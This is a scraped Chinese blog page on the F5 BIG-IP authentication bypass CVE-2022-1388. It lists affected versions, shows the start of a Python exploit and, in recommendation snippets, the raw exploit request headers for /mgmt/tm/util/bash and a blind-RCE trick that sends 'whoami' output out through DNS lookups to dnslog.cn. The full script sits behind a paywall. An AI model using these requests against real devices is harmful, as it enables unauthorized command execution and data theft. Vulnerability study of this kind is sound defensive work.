CVE-2022-1388-F5BIG-IP未授权RCE流量特征分析

最新推荐文章于 2025-06-09 03:09:26 发布
原创 最新推荐文章于 2025-06-09 03:09:26 发布 · 573 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tcp/ip #bash #网络协议

简介

此操作仅用于技术交流和学习研究使用,请勿用于非法攻击,否则造成一切后果与本人无关

在F5 BIG-IP 16.1.x 16.1.2.2之前的版本、15.1.5.1之前的15.1.x版本、14.1.4.6之前的14.1.x版本、13.1.5之前的13.1.x版本以及所有12.1.x和11.6.x版本,未公开的请求可能会绕过iControl REST身份验证。注意:未评估已达到技术支持终止(EoTS)的软件版本。

此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务。

Poc/exp

POC地址

具体POC可参考:

#!/usr/bin/python3
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def exploit(target, command):
    url = f'https://{
     
     target}/mgmt/tm/util/bash'
    headers = {
   
   
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',        
        'Connection': 'X-F5-Auth-Token'
最低0.47元/天 解锁文章

200万优质内容无限畅学
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
不忘初心,护天下安全!
06-27 1005
20225月6日,F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。组件:F5 BIG-IP iControl REST漏洞类型:身份验证绕过影响:命令执行简述:该漏洞允许未经身份验证的攻击者通过管理口
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
qq_32660043的博客
03-22 4584
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
漏洞CVE-2022-1388
x10n9的博客
03-10 681
CVE-2022-1388是一个影响F5 BIG-IP设备的严重漏洞12,它可以让未经身份验证的攻击者绕过iControl REST认证,通过管理端口执行恶意命令。
未授权访问漏洞复现及总结
最新发布
weixin_40801021的博客
06-09 184
常见的漏洞有FTP 未授权访问(21)、Rsync 未授权访问(873)、ZooKeeper 未授权访问(2181)、Docker 未授权访问(2375)、VNC 未授权访问5900、5901)、Redis 未授权访问(6379)、JBoss 未授权访问(8080)、Jenkins 未授权访问(8080)、HadoopYARN 未授权访问(8088)、MongoDB 未授权访问(27017)等。在应急响应未授权访问漏洞事件时,“快速隔离、详尽取证、彻底根除、持续监控” 是核心原则。
[旧文系列] CVE-2020-5902: F5 BIG-IP RCE 漏洞复现与分析
mole_exp的博客
01-05 4303
文章目录关于<旧文迁移>1、前言2、搭建漏洞环境3、漏洞复现3.1 任意文件读取3.2 列出目录项3.3 RCE4、搭建漏洞调试环境5、漏洞分析5.1 坑5.2 漏洞原理Apache与Tomcat对分号 ; 的解析差异5.3 小结参考 关于<旧文迁移> <旧文迁移>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发地址:hxxps://medium.com/@m01e/cve-2020-5902-f5-big-ip-rce-漏洞分
CVE-2022-1388:F5 BIG-IP iControl REST RCE
Fly_鹏程万里
05-12 746
影响产品 F5 BIG-IP 11.6.1 - 11.6.5 F5 BIG-IP 12.1.0 - 12.1.6 F5 BIG-IP 13.1.0 - 13.1.4 F5 BIG-IP 14.1.0 - 14.1.4 F5 BIG-IP 15.1.0 - 15.1.5 F5 BIG-IP 16.1.0 - 16.1.2 漏洞影响 此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务 漏洞检测 检测脚本:
F5 BIG-IP RCE exploitation (CVE-2022-1388).md
07-09
F5 BIG-IP RCE exploitation (CVE-2022-1388)
CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE
03-25
外伤的影响 ... F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5IP 16.0.0-16.0.1 Vunl Check 基本用法 python3 CVE_2021_22986.py
BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986)1
08-08
这是一个针对F5 BIG-IPBIG-IQ系统的严重漏洞,被称为未授权远程代码执行(RCE)漏洞。攻击者无需任何身份验证,通过iControl REST接口发送恶意构造的请求,就能在目标系统上执行任意命令,从而获得对设备的完全...
CVE-2022-1388:F5 BIG-IP远程命令执行
Websec
05-13 2144
参考文章: F5 BIG-IP(CVE-2022-1388) RCE GitHub - horizon3ai/CVE-2022-1388: POC for CVE-2022-1388 1、漏洞描述 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST 是iControl 框架的演变,使用 REpresentational State Transfer (REST)。这允许用户或脚本与 F5 设备之间进行轻量级、快速的交互
从F5 BIG-IP RCE漏洞(CVE-2023-46747)来看请求走私的利用价值
C20220511的博客
11-08 1461
关于绕过权限之后F5 BIG-IP执行命令的逻辑在F5历史漏洞CVE-2022-1388中已经使用过,其实F5 BIG-IP本身就提供了接口/mgmt/tm/util/bash为后台用户执行系统命令的,有兴趣的读者也可以看https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg了解详细的创建用户和后台命令执行的逻辑。从图2.3可以看出,整个AJP请求走私的流程是可以把一个HTTP请求经过AJP代理转化之后转化为两个AJP请求,这也是请求走私名字的来源。
自学黑客(网络安全),一般人我劝你还是算了吧
顶峰
09-22 338
网络安全自学路线
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞
LiBai'S BLOG
05-06 7509
漏洞描述 BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。 CVE-2022-1388 未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。 漏洞危害 该漏洞CVSS评分:9.8 危害等级:严重 影响范围 11.6.1 - 11..
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
weixin_50464560的博客
05-10 2198
转载至CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现-网盾安全学院 (315safe.com) 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。20225月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-1388,影响版本如下: 环境搭建 下载v15.x系列: 首次运行需要修改
CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现
热爱学习,喜欢折腾!
09-02 3039
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。
F5 CVE-2022-1388 CVE-2021-22986测试
weixin_44184011的博客
08-14 1123
又到了护网的时候,客户开始关注安全问题,来跟我咨询两个F5CVECVE-2022-1388 CVE-2021-22986。在给客户提供了解决方案之后,由于这两个CVE时间都比较长(一个是2021年一个是2022年的),所以做了个简单的POC。两个CVE都是基于F5的RESTAPI进行利用,可绕过身份验证,远程执行命令。可通过升级的方式修复,如果暂时不方便升级,可以根据官方指示进行缓解。
EFK 监控 F5 BigIP 流量测试
Pzhang的博客
04-02 1106
EFK 监控 F5 BigIP 流量测试 EFK 测试环境搭建 F5 BigIP 测试环境搭建 数据源测试脚本 这里使用 Python 发送多个异步 http get requests。 [root@asm-replay network-tester]# cat http-test.py import eventlet eventlet.monkey_patch() import request...
lkwa-blind-rce盲打rce
devil8123665的博客
05-26 764
1、blind-rce 因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog 站点:http://www.dnslog.cn/ 在盲打界面输入指令 ping `whoami`.5w8un1.dnslog.cn 提交后到dnslog中刷新记录可以看到如下图中所示用户为“application” 针对根目录测试 ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog....
CVE-2022-1388-EXP(F5-BIGIP)
PolarPeak的博客
05-14 1127
简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 EXP POST /mgmt/tm/util/bash HTTP/1.1 Host: X-F5-Auth-Token: a Authorization: Basic YWRtaW46 Connection: keep-alive, x-F5-Auth-Token Content-Length: 0 Cache-Control: max-age=0 {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值